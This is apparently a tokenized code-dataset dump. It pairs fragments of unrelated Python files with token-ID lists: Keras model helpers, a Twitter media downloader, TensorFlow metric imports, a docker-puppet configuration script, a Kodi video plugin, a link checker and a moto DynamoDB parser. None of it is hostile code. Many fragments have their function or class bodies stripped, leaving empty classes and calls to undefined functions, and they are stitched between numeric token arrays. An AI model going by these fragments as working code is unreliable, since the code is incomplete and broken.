content
stringlengths
1
1.05M
input_ids
listlengths
1
883k
ratio_char_token
float64
1
22.9
token_count
int64
1
883k
#!/usr/bin/env python # -*- coding: utf-8 -*- import os import numpy as np from unittest import TestCase from core.feature_extraction.galaxy.galaxy_processor import GalaxyProcessor from commons.helpers.dataset.strategies.galaxy_dataset.label_strategy import GalaxyDataSetLabelStrategy from commons.helpers.dataset.context import Context
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 11748, 28686, 198, 11748, 299, 32152, 355, 45941, 198, 6738, 555, 715, 395, 1330, 6208, 20448, 198, 6738, 4755, 13...
3.149533
107
from django.conf import settings from django.core.management import call_command from django.core.management.base import BaseCommand from os import path
[ 6738, 42625, 14208, 13, 10414, 1330, 6460, 198, 6738, 42625, 14208, 13, 7295, 13, 27604, 1330, 869, 62, 21812, 198, 6738, 42625, 14208, 13, 7295, 13, 27604, 13, 8692, 1330, 7308, 21575, 198, 6738, 28686, 1330, 3108, 628 ]
4.052632
38
"""Registry utilities to handle formats for gmso Topology.""" SaversRegistry = Registry() LoadersRegistry = Registry()
[ 37811, 8081, 4592, 20081, 284, 5412, 17519, 329, 308, 76, 568, 5849, 1435, 526, 15931, 628, 628, 198, 50, 30400, 8081, 4592, 796, 33432, 3419, 198, 8912, 364, 8081, 4592, 796, 33432, 3419, 628, 198 ]
3.571429
35
dosyaadi = input("Enter file name: ") dosyaadi = str(dosyaadi + ".txt") with open(dosyaadi, 'r') as file : dosyaicerigi = file.read() silinecek = str(input("Enter the text that you wish to delete: ")) dosyaicerigi = dosyaicerigi.replace(silinecek, '') with open(dosyaadi, 'w') as file: file.write(dosyaicerigi) file.close() print("-" * 30) print("Successfully deleted!") print("-" * 30)
[ 37427, 3972, 9189, 796, 5128, 7203, 17469, 2393, 1438, 25, 366, 8, 201, 198, 37427, 3972, 9189, 796, 965, 7, 37427, 3972, 9189, 1343, 27071, 14116, 4943, 201, 198, 201, 198, 4480, 1280, 7, 37427, 3972, 9189, 11, 705, 81, 11537, 355, ...
2.497006
167
import tensorflow as tf class CustomModelCheckpoint(tf.keras.callbacks.ModelCheckpoint): class CustomEarlyStopping(tf.keras.callbacks.EarlyStopping): def get_losses(): losses = [tf.keras.losses.BinaryCrossentropy()] return losses def get_metrics(single_output_idx, add_normal=False): metrics = [] if single_output_idx is None: # Multi-label print("###### Multi-label classification ######") metrics += [ BinaryAccuracy_Infiltrates, BinaryAccuracy_Pneumonia, BinaryAccuracy_Covid19 ] # Add normal class if add_normal: metrics.append(BinaryAccuracy_Normal) else: print(f"###### Multi-class classification (cls: '{single_output_idx}') ######") metrics = [ tf.keras.metrics.BinaryAccuracy(), tf.keras.metrics.AUC(), tf.keras.metrics.Precision(), tf.keras.metrics.Recall() ] return metrics def get_model(backbone, classes=None, target_size=None, freeze_base_model=True, ignore_model=None): istrainable = not freeze_base_model # Select backbone if backbone == "resnet50": from tensorflow.keras.applications.resnet import ResNet50 as TFModel from tensorflow.keras.applications.resnet import preprocess_input elif backbone == "resnet50v2": from tensorflow.keras.applications.resnet_v2 import ResNet50V2 as TFModel from tensorflow.keras.applications.resnet_v2 import preprocess_input elif backbone == "resnet101v2": from tensorflow.keras.applications.resnet_v2 import ResNet101V2 as TFModel from tensorflow.keras.applications.resnet_v2 import preprocess_input elif backbone == "vgg16": from tensorflow.keras.applications.vgg16 import VGG16 as TFModel from tensorflow.keras.applications.vgg16 import preprocess_input elif backbone == "efficientnetb0": from tensorflow.keras.applications.efficientnet import EfficientNetB0 as TFModel from tensorflow.keras.applications.efficientnet import preprocess_input elif backbone == "efficientnetb7": from tensorflow.keras.applications.efficientnet import EfficientNetB7 as TFModel from tensorflow.keras.applications.efficientnet import preprocess_input else: raise ValueError(f"Unknown backbone: {backbone}") if ignore_model: model = None else: # Instantiate base model with pre-trained weights base_model = TFModel(input_shape=(*target_size, 3), include_top=False, weights="imagenet") # Freeze base model # base_model.trainable = istrainable for layers in base_model.layers: layers.trainable = istrainable # Create a new model on top inputs = base_model.input x = base_model(inputs) # Option A x = tf.keras.layers.GlobalAveragePooling2D(name='avg_pool')(x) # Option B # x = tf.keras.layers.Flatten(name='flatten')(x) # x = tf.keras.layers.Dense(512, activation='relu', name='fc1')(x) # x = tf.keras.layers.Dense(512, activation='relu', name='fc2')(x) # Outputs outputs = tf.keras.layers.Dense(classes, activation="sigmoid", name='predictions')(x) model = tf.keras.Model(inputs, outputs) return model, preprocess_input def add_tabular_input(model, classes): # Input1 input1 = model.input input2 = tf.keras.layers.Input(shape=(2,), name="input_2b") # Pre-outputs 1x3 + 1x3 output1 = model.output output2 = tf.keras.layers.Dense(classes, activation="sigmoid", name='output_tab')(input2) # Outputs x = tf.keras.layers.Concatenate(axis=1)([output1, output2]) output = tf.keras.layers.Dense(classes, activation="sigmoid", name='final_predictions')(x) model = tf.keras.Model([input1, input2], output) return model def unfreeze_base_model(model, n=None, unfreeze=True): base_model = model.layers[1].layers # Select number of layers to unfreeze idx = 0 if n is not None: if isinstance(n, int): idx = n print(f"Unfreezing {len(base_model) - idx} layers") elif isinstance(n, float) and 0.0 < n <= 1.0: idx = int(len(base_model) * n) print(f"Unfreezing {idx} layers") else: raise ValueError("Invalid number of layers") # We unfreeze all layers but BatchNorm (to not destroy the non-trainable weights) for layer in base_model[-idx:]: if not isinstance(layer, tf.keras.layers.BatchNormalization): layer.trainable = True
[ 11748, 11192, 273, 11125, 355, 48700, 628, 628, 628, 198, 4871, 8562, 17633, 9787, 4122, 7, 27110, 13, 6122, 292, 13, 13345, 10146, 13, 17633, 9787, 4122, 2599, 628, 198, 4871, 8562, 20457, 1273, 33307, 7, 27110, 13, 6122, 292, 13, 13...
2.365493
1,959
import re import json import time import sys import httplib2 from twitter import * import magic if __name__ == '__main__': for i in range(1, len(sys.argv)): tw = TwitterMediaDL() for tweetID in tw.get_medias(sys.argv[i]): list_url = tw.get_image_url(tweetID) for j in range(0, len(list_url)): raw = tw.http_wrapper(list_url[j]) ext = tw.get_file_extension(raw) with open('{:d}_{:d}.{:s}'.format(tweetID, j, ext), 'wb') as f: f.write(raw)
[ 11748, 302, 198, 11748, 33918, 198, 11748, 640, 198, 11748, 25064, 198, 198, 11748, 1841, 489, 571, 17, 198, 6738, 17044, 1330, 1635, 198, 11748, 5536, 628, 198, 361, 11593, 3672, 834, 6624, 705, 834, 12417, 834, 10354, 198, 220, 220, ...
1.944056
286
# Copyright 2016 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Ops for evaluation metrics and summary statistics. See the @{$python/contrib.metrics} guide. @@streaming_accuracy @@streaming_mean @@streaming_recall @@streaming_recall_at_thresholds @@streaming_precision @@streaming_precision_at_thresholds @@streaming_auc @@streaming_curve_points @@streaming_recall_at_k @@streaming_mean_absolute_error @@streaming_mean_iou @@streaming_mean_relative_error @@streaming_mean_squared_error @@streaming_mean_tensor @@streaming_root_mean_squared_error @@streaming_covariance @@streaming_pearson_correlation @@streaming_mean_cosine_distance @@streaming_percentage_less @@streaming_sensitivity_at_specificity @@streaming_sparse_average_precision_at_k @@streaming_sparse_average_precision_at_top_k @@streaming_sparse_precision_at_k @@streaming_sparse_precision_at_top_k @@streaming_sparse_recall_at_k @@streaming_specificity_at_sensitivity @@streaming_concat @@streaming_false_negatives @@streaming_false_negatives_at_thresholds @@streaming_false_positives @@streaming_false_positives_at_thresholds @@streaming_true_negatives @@streaming_true_negatives_at_thresholds @@streaming_true_positives @@streaming_true_positives_at_thresholds @@auc_using_histogram @@accuracy @@aggregate_metrics @@aggregate_metric_map @@confusion_matrix @@set_difference @@set_intersection @@set_size @@set_union """ from __future__ import absolute_import from __future__ import division from __future__ import print_function # pylint: disable=unused-import,line-too-long,g-importing-member,wildcard-import from tensorflow.contrib.metrics.python.metrics import * # pylint: enable=wildcard-import from tensorflow.contrib.metrics.python.ops.confusion_matrix_ops import confusion_matrix from tensorflow.contrib.metrics.python.ops.histogram_ops import auc_using_histogram from tensorflow.contrib.metrics.python.ops.metric_ops import aggregate_metric_map from tensorflow.contrib.metrics.python.ops.metric_ops import aggregate_metrics from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_accuracy from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_auc from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_concat from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_covariance from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_curve_points from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_negatives from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_negatives_at_thresholds from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_positives from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_positives_at_thresholds from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_absolute_error from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_cosine_distance from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_iou from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_relative_error from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_squared_error from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_tensor from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_pearson_correlation from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_percentage_less from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_precision from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_precision_at_thresholds from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_recall from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_recall_at_k from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_recall_at_thresholds from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_root_mean_squared_error from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sensitivity_at_specificity from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_average_precision_at_k from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_average_precision_at_top_k from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_precision_at_k from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_precision_at_top_k from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_recall_at_k from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_specificity_at_sensitivity from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_negatives from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_negatives_at_thresholds from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_positives from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_positives_at_thresholds from tensorflow.contrib.metrics.python.ops.set_ops import set_difference from tensorflow.contrib.metrics.python.ops.set_ops import set_intersection from tensorflow.contrib.metrics.python.ops.set_ops import set_size from tensorflow.contrib.metrics.python.ops.set_ops import set_union # pylint: enable=unused-import,line-too-long from tensorflow.python.util.all_util import remove_undocumented remove_undocumented(__name__)
[ 2, 15069, 1584, 383, 309, 22854, 37535, 46665, 13, 1439, 6923, 33876, 13, 198, 2, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 198, 2, 345, 743, 407, 779, 428, 2393, 2845, 287, 11846, ...
3.11744
1,984
#!/usr/bin/env python # -*- coding: utf-8 -*- ############################################################################### # Copyright 2013 Kitware Inc. # # Licensed under the Apache License, Version 2.0 ( the "License" ); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ############################################################################### import datetime from .model_base import AccessControlledModel,\ ValidationException,\ AccessException from girder.constants import AccessType
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 29113, 29113, 7804, 4242, 21017, 198, 2, 220, 15069, 2211, 10897, 1574, 3457, 13, 198, 2, 198, 2, 220, 49962, 73...
3.958159
239
#!/usr/bin/env python # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # Shell script tool to run puppet inside of the given docker container image. # Uses the config file at /var/lib/docker-puppet/docker-puppet.json as a source for a JSON # array of [config_volume, puppet_tags, manifest, config_image, [volumes]] settings # that can be used to generate config files or run ad-hoc puppet modules # inside of a container. import glob import json import logging import os import sys import subprocess import sys import tempfile import multiprocessing log = logging.getLogger() ch = logging.StreamHandler(sys.stdout) if os.environ.get('DEBUG', False): log.setLevel(logging.DEBUG) ch.setLevel(logging.DEBUG) else: log.setLevel(logging.INFO) ch.setLevel(logging.INFO) formatter = logging.Formatter('%(asctime)s %(levelname)s: %(message)s') ch.setFormatter(formatter) log.addHandler(ch) # this is to match what we do in deployed-server process_count = int(os.environ.get('PROCESS_COUNT', multiprocessing.cpu_count())) log.info('Running docker-puppet') config_file = os.environ.get('CONFIG', '/var/lib/docker-puppet/docker-puppet.json') log.debug('CONFIG: %s' % config_file) with open(config_file) as f: json_data = json.load(f) # To save time we support configuring 'shared' services at the same # time. For example configuring all of the heat services # in a single container pass makes sense and will save some time. # To support this we merge shared settings together here. # # We key off of config_volume as this should be the same for a # given group of services. We are also now specifying the container # in which the services should be configured. This should match # in all instances where the volume name is also the same. configs = {} for service in (json_data or []): if service is None: continue if isinstance(service, dict): service = [ service.get('config_volume'), service.get('puppet_tags'), service.get('step_config'), service.get('config_image'), service.get('volumes', []), ] config_volume = service[0] or '' puppet_tags = service[1] or '' manifest = service[2] or '' config_image = service[3] or '' volumes = service[4] if len(service) > 4 else [] if not manifest or not config_image: continue log.info('config_volume %s' % config_volume) log.info('puppet_tags %s' % puppet_tags) log.info('manifest %s' % manifest) log.info('config_image %s' % config_image) log.info('volumes %s' % volumes) # We key off of config volume for all configs. if config_volume in configs: # Append puppet tags and manifest. log.info("Existing service, appending puppet tags and manifest") if puppet_tags: configs[config_volume][1] = '%s,%s' % (configs[config_volume][1], puppet_tags) if manifest: configs[config_volume][2] = '%s\n%s' % (configs[config_volume][2], manifest) if configs[config_volume][3] != config_image: log.warn("Config containers do not match even though" " shared volumes are the same!") else: log.info("Adding new service") configs[config_volume] = service log.info('Service compilation completed.') # Holds all the information for each process to consume. # Instead of starting them all linearly we run them using a process # pool. This creates a list of arguments for the above function # to consume. process_map = [] for config_volume in configs: service = configs[config_volume] puppet_tags = service[1] or '' manifest = service[2] or '' config_image = service[3] or '' volumes = service[4] if len(service) > 4 else [] if puppet_tags: puppet_tags = "file,file_line,concat,augeas,%s" % puppet_tags else: puppet_tags = "file,file_line,concat,augeas" process_map.append([config_volume, puppet_tags, manifest, config_image, volumes]) for p in process_map: log.debug('- %s' % p) # Fire off processes to perform each configuration. Defaults # to the number of CPUs on the system. p = multiprocessing.Pool(process_count) returncodes = list(p.map(mp_puppet_config, process_map)) config_volumes = [pm[0] for pm in process_map] success = True for returncode, config_volume in zip(returncodes, config_volumes): if returncode != 0: log.error('ERROR configuring %s' % config_volume) success = False # Update the startup configs with the config hash we generated above config_volume_prefix = os.environ.get('CONFIG_VOLUME_PREFIX', '/var/lib/config-data') log.debug('CONFIG_VOLUME_PREFIX: %s' % config_volume_prefix) startup_configs = os.environ.get('STARTUP_CONFIG_PATTERN', '/var/lib/tripleo-config/docker-container-startup-config-step_*.json') log.debug('STARTUP_CONFIG_PATTERN: %s' % startup_configs) infiles = glob.glob('/var/lib/tripleo-config/docker-container-startup-config-step_*.json') for infile in infiles: with open(infile) as f: infile_data = json.load(f) for k, v in infile_data.iteritems(): config_volume = match_config_volume(config_volume_prefix, v) if config_volume: config_hash = get_config_hash(config_volume_prefix, config_volume) if config_hash: env = v.get('environment', []) env.append("TRIPLEO_CONFIG_HASH=%s" % config_hash) log.debug("Updating config hash for %s, config_volume=%s hash=%s" % (k, config_volume, config_hash)) infile_data[k]['environment'] = env outfile = os.path.join(os.path.dirname(infile), "hashed-" + os.path.basename(infile)) with open(outfile, 'w') as out_f: json.dump(infile_data, out_f) if not success: sys.exit(1)
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 2, 198, 2, 220, 220, 220, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 345, 743, 198, 2, 220, 220, 220, 407, 779, 428, 2393, 2845, 287, 1184...
2.619935
2,468
# -*- coding: utf-8 -*- import sys import urllib import urlparse # import xbmc import xbmcgui import xbmcplugin import aci # Get the plugin url in plugin:// notation. _url = sys.argv[0] # Get the plugin handle as an integer number. _handle = int(sys.argv[1]) # Get an instance of ACI. ATV = aci.ACI() ATV.load_aci() # Encode user agent headers for video. user_agent_headers = urllib.urlencode({'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 ' 'Firefox/47.0 FirePHP/0.7.4', 'X-Requested-With': 'ShockwaveFlash/22.0.0.192' }) def get_url(**kwargs): """ Create a URL for calling the plugin recursively from the given set of keyword arguments. :param kwargs: "argument=value" pairs :type kwargs: dict :return: plugin call URL :rtype: str """ return '{0}?{1}'.format(_url, urllib.urlencode(kwargs)) def get_categories(): """ Get the list of video categories. Here you can insert some parsing code that retrieves the list of video categories (e.g. 'Movies', 'TV-shows', 'Documentaries' etc.) from some site or server. .. note:: Consider using `generator functions <https://wiki.python.org/moin/Generators>`_ instead of returning lists. :return: The list of video categories :rtype: types.GeneratorType """ return ATV.aci.iterkeys() def get_videos(category): """ Get the list of video files/streams. Here you can insert some parsing code that retrieves the list of video streams in the given category from some site or server. .. note:: Consider using `generators functions <https://wiki.python.org/moin/Generators>`_ instead of returning lists. :param category: Category name :type category: str :return: the list of videos in the category :rtype: list """ return ATV.aci[category] def list_categories(): """ Create the list of video categories in the Kodi interface. """ # Set plugin category. It is displayed in some skins as the name # of the current section. xbmcplugin.setPluginCategory(_handle, 'ACI') # Set plugin content. It allows Kodi to select appropriate views # for this type of content. xbmcplugin.setContent(_handle, 'videos') # Get video categories categories = get_categories() # Iterate through categories for category in categories: # xbmc.log(category.encode("utf-8"), xbmc.LOGNOTICE) # Create a list item with a text label and a thumbnail image. list_item = xbmcgui.ListItem(label=category.title()) # Set graphics (thumbnail, fanart, banner, poster, landscape etc.) for the list item. # Here we use the same image for all items for simplicity's sake. # In a real-life plugin you need to set each image accordingly. list_item.setArt({'thumb': "icon.png", 'icon': "icon.png", 'fanart': "icon.png"}) # Set additional info for the list item. # Here we use a category name for both properties for for simplicity's sake. # setInfo allows to set various information for an item. # For available properties see the following link: # https://codedocs.xyz/xbmc/xbmc/group__python__xbmcgui__listitem.html#ga0b71166869bda87ad744942888fb5f14 # 'mediatype' is needed for a skin to display info for this ListItem correctly. list_item.setInfo('video', {'title': category.title(), 'genre': category.title(), 'mediatype': 'video'}) # Create a URL for a plugin recursive call. # Example: plugin://plugin.video.example/?action=listing&category=[category name] url = get_url(action="listing", category=category) # is_folder = True means that this item opens a sub-list of lower level items. is_folder = True # Add our item to the Kodi virtual folder listing. xbmcplugin.addDirectoryItem(_handle, url, list_item, is_folder) # Add a sort method for the virtual folder items (alphabetically, ignore articles) xbmcplugin.addSortMethod(_handle, xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE) # Finish creating a virtual folder. xbmcplugin.endOfDirectory(_handle) def list_videos(category): """ Create the list of playable videos in the Kodi interface. :param category: Category name :type category: str """ # Set plugin category. It is displayed in some skins as the name # of the current section. xbmcplugin.setPluginCategory(_handle, category) # Set plugin content. It allows Kodi to select appropriate views # for this type of content. xbmcplugin.setContent(_handle, 'videos') # Get the list of videos in the category. videos = get_videos(category) # Iterate through each video. for video_id in videos: # Get the video item to process. video_item = videos[video_id] # Create a list item with a text label and a thumbnail image. list_item = xbmcgui.ListItem(label=video_item["title"]) # Set additional info for the list item. # 'mediatype' is needed for skin to display info for this ListItem correctly. list_item.setInfo('video', {'title': video_item["title"], 'genre': category.title(), 'mediatype': 'video'}) # Set graphics (thumbnail, fanart, banner, poster, landscape etc.) for the list item. # Here we use the same image for all items for simplicity's sake. # In a real-life plugin you need to set each image accordingly. list_item.setArt({'thumb': video_item["thumbnail"], 'icon': video_item["thumbnail"], 'fanart': video_item["thumbnail"] }) # Set 'IsPlayable' property to 'true'. # This is mandatory for playable items! list_item.setProperty('IsPlayable', 'true') referer_header = urllib.urlencode({"Referer": video_item["location"]}) video_item['url'] += '|%s&amp;%s' % (user_agent_headers, referer_header) # Create a URL for a plugin recursive call. # Example: plugin://plugin.video.example/?action=play& # video=[video url] url = get_url(action='play', video=video_item['url']) # video_url = 'plugin://plugin.video.f4mTester/?url=' + urllib.quote_plus(video['video']) + \ # '&amp;streamtype=HLSRETRY&name=' + urllib.quote_plus(video['name']) + \ # '&amp;|User-Agent=Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 ' \ # 'FirePHP/0.7.4&amp;X-Requested-With=ShockwaveFlash/22.0.0.192&amp;Referer=' + \ # urllib.quote_plus(video['reference']) # url = get_url(action='play', video=video_url) # Add the list item to a virtual Kodi folder. # is_folder = False means that this item won't open any sub-list. is_folder = False # Add our item to the Kodi virtual folder listing. xbmcplugin.addDirectoryItem(_handle, url, list_item, is_folder) # Add a sort method for the virtual folder items (alphabetically, ignore articles) xbmcplugin.addSortMethod(_handle, xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE) # Finish creating a virtual folder. xbmcplugin.endOfDirectory(_handle) def play_video(path): """ Play a video by the provided path. :param path: Fully-qualified video URL :type path: str """ # Create a playable item with a path to play. play_item = xbmcgui.ListItem(path=path) # Play with inputstream addon. play_item.setProperty('inputstreamaddon', 'inputstream.adaptive') play_item.setProperty('inputstream.adaptive.manifest_type', 'hls') # Pass the item to the Kodi player. xbmcplugin.setResolvedUrl(_handle, True, listitem=play_item) def router(paramstring): """ Router function that calls other functions depending on the provided paramstring :param paramstring: URL encoded plugin paramstring :type paramstring: str """ # Parse a URL-encoded paramstring to the dictionary of # {<parameter>: <value>} elements params = dict(urlparse.parse_qsl(paramstring)) # Check the parameters passed to the plugin if params: if params['action'] == 'listing': # Load the videos for aci. if params['category'] == "shows": ATV.update_aci_shows() print("Updated from main shows.") elif params['category'] == "cable": ATV.update_aci_cable() print("Updated from main cable.") elif params['category'] == "movies": ATV.update_aci_movies() print("Updated from main movies.") # Display the list of videos in a provided category. list_videos(params['category']) elif params['action'] == 'play': # Play a video from a provided URL. play_video(params['video']) else: # If the provided paramstring does not contain a supported action # we raise an exception. This helps to catch coding errors, # e.g. typos in action names. raise ValueError('Invalid paramstring: {0}!'.format(paramstring)) else: # Load ATV. ATV.load_aci() # If the plugin is called from Kodi UI without any parameters, # display the list of video categories list_categories() if __name__ == '__main__': # Call the router function and pass the plugin call parameters to it. # We use string slicing to trim the leading '?' from the plugin call paramstring router(sys.argv[2][1:])
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 11748, 25064, 198, 11748, 2956, 297, 571, 198, 11748, 19016, 29572, 198, 198, 2, 1330, 2124, 20475, 66, 198, 11748, 2124, 20475, 66, 48317, 198, 11748, 2124, 20475, ...
2.496006
4,006
# Copyright (c) 2020, Apple Inc. All rights reserved. # # Use of this source code is governed by a BSD-3-clause license that can be # found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause import logging from coremltools.converters.mil.input_types import ( InputType, TensorType, ImageType, RangeDim, _get_shaping_class, ) from coremltools.converters.mil.input_types import Shape as InputShape from coremltools.converters.mil.mil.var import Var from coremltools.converters.mil.mil import get_new_symbol from coremltools.converters.mil.mil.types.symbolic import is_symbolic from coremltools.converters.mil.mil.types import is_tensor from coremltools.converters.mil.mil import types from .basic_graph_ops import topsort, simple_topsort from .convert_utils import convert_graph from coremltools.converters.mil.mil import Builder as mb from coremltools.converters.mil.mil import Program from coremltools.converters.mil.mil import Function from .ssa_passes.tf_passes import tensorflow_passes from coremltools.converters._profile_utils import _profile # TranscriptionContext maintains a map of tf_node.name --> ssa_var available # to the current TF --> tfssa transcription.
[ 2, 220, 15069, 357, 66, 8, 12131, 11, 4196, 3457, 13, 1439, 2489, 10395, 13, 198, 2, 198, 2, 220, 5765, 286, 428, 2723, 2438, 318, 21825, 416, 257, 347, 10305, 12, 18, 12, 565, 682, 5964, 326, 460, 307, 198, 2, 220, 1043, 287, ...
2.992665
409
#!/usr/bin/env python # Copyright (c) 2016 Clay Wells # # A Python-based link checker. # # Usage: pylinkcheck.py -r https://www.example.com # # By default, we can spider and check all of the links found at the URL's # domain. For example, a check of https://foo.example.com will only check # links with the base URL path of foo.example.com. Link found to # bar.example.com will not be checked. # # Fancy run-time options # url root (domain): this is simply required # generate report file: -o output.txt, --output=output.txt # limit depth: -l 2, --limit=2 # TODO: report format: --format=txt,html,xml ############################################################################## import argparse import urllib2 import csv from datetime import datetime import re from urlparse import urlparse from bs4 import BeautifulSoup ####################################### # Functions # Spider the base URL # Print an informative summary of the dead links ####################################### # Main program # # Get command line options parser = argparse.ArgumentParser(description='A Python-based link checker.') parser.add_argument('-f','--format', required=False, default='txt', help='Output file format ') parser.add_argument('-l','--limit', required=False, default=2, help='Limit directory depth, example.com/limit/dir/depth/') parser.add_argument('-u','--url', help='Base URL to check', required=True) parser.add_argument('-o','--output', help='Output file name', required=False) args = parser.parse_args() # Assign program arguments to variables # - we may want to add a '/' to baseurl if it's not present. # - if the href links are relative we need to add the baseurl when checking # the link. baseurl = str(args.url) pathlimit = int(args.limit) # Show values print 'Base URL: %s' % args.url print 'Output file format: %s' % args.format print 'Output file: %s' % args.output print 'Limit spider: %d' % args.limit # Grab today's date for timestamping output file. now = datetime.now() tstamp = now.strftime("%Y%m%d-%H%M") # Grab all a href links checkurl = urllib2.urlopen(baseurl).read() soup = BeautifulSoup(checkurl, 'html.parser') # Spider the site and build our list of URLs to check spiderURL(baseurl, pathlimit) deadlinks = [] # This for loop will completely change once the spiderURL function is working. # We'll iterate over the various directory paths instead. outofscope = 0 # Check the URLs for link in soup("a"): # Fetch the link but only return the status code # hrefs are unpredicatable we can add a function to 'clean' them up, i.e., # get the proto, domain, path, file (TODO: for a complete solution we # need to get all of this) #if baseurl[:-1] == '/': # print '[debug] strip last char from baseurl' # mailto: is causing an error href = link.get('href') print '[debug] href: %s' % href if re.match('^mailto', href): # skip this one continue # Separate the file from the path thisurl = urlparse(href) if thisurl.netloc != baseurl and thisurl.netloc != '': print '[-] HREF %s is out of scope' % thisurl.netloc outofscope = 1 else: print '[debug] path %s' % thisurl.path outofscope = 0 # Build the full URL if the href is relative. # - assuming, for now, other protocols are not desired # - place this in the Spider function try: if re.match('^http', href): checkurl = href else: checkurl = baseurl + href except: print '[-] Unknown error in re.match()' try: #print '[+] checking %s' % checkurl hrefpage = urllib2.urlopen(checkurl) except urllib2.HTTPError as e: if e.code == 404: print '[-] 404 ERROR: %s' % checkurl # add this URL to deadlink list deadlinks.append(checkurl) else: print '[-] HTTP ERROR: %d - %s' % (e.code, checkurl) except urllib2.URLError as e: # Not an HTTP-specific error (e.g. connection refused) print '[-] NON-HTTP ERROR: %d - %s' % (e.code, checkurl) else: print '[+] Status %d for %s' % (hrefpage.getcode(), checkurl) printReport(deadlinks) # EOF
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 198, 2, 15069, 357, 66, 8, 1584, 15551, 18292, 220, 198, 2, 198, 2, 317, 11361, 12, 3106, 2792, 2198, 263, 13, 198, 2, 220, 220, 198, 2, 29566, 25, 279, 2645, 676, 9122, 13, 9078...
3.024924
1,324
import logging from abc import abstractmethod import abc import six from collections import deque from moto.dynamodb2.parsing.ast_nodes import ( UpdateExpression, UpdateExpressionSetClause, UpdateExpressionSetActions, UpdateExpressionSetAction, UpdateExpressionRemoveActions, UpdateExpressionRemoveAction, UpdateExpressionPath, UpdateExpressionValue, UpdateExpressionGroupedValue, UpdateExpressionRemoveClause, ExpressionPathDescender, ExpressionSelector, ExpressionAttribute, ExpressionAttributeName, ExpressionAttributeValue, ExpressionValueOperator, UpdateExpressionFunction, UpdateExpressionAddClause, UpdateExpressionAddActions, UpdateExpressionAddAction, UpdateExpressionDeleteAction, UpdateExpressionDeleteActions, UpdateExpressionDeleteClause, ) from moto.dynamodb2.exceptions import InvalidTokenException, InvalidUpdateExpression from moto.dynamodb2.parsing.tokens import Token, ExpressionTokenizer class UpdateExpressionParser(ExpressionParser, NestableExpressionParserMixin): """ Parser to create update expressions """ def __init__(self, *args, **kwargs): super(UpdateExpressionParser, self).__init__(*args, **kwargs) NestableExpressionParserMixin.__init__(self) def _parse(self): """ Update Expression is the top-most node therefore it is expected to end up at the end of the expression. """ while True: self.skip_white_space() if self.is_at_end(): logging.debug("End reached") break elif self._parse_by_a_subfactory(): continue else: self.raise_unexpected_token() return 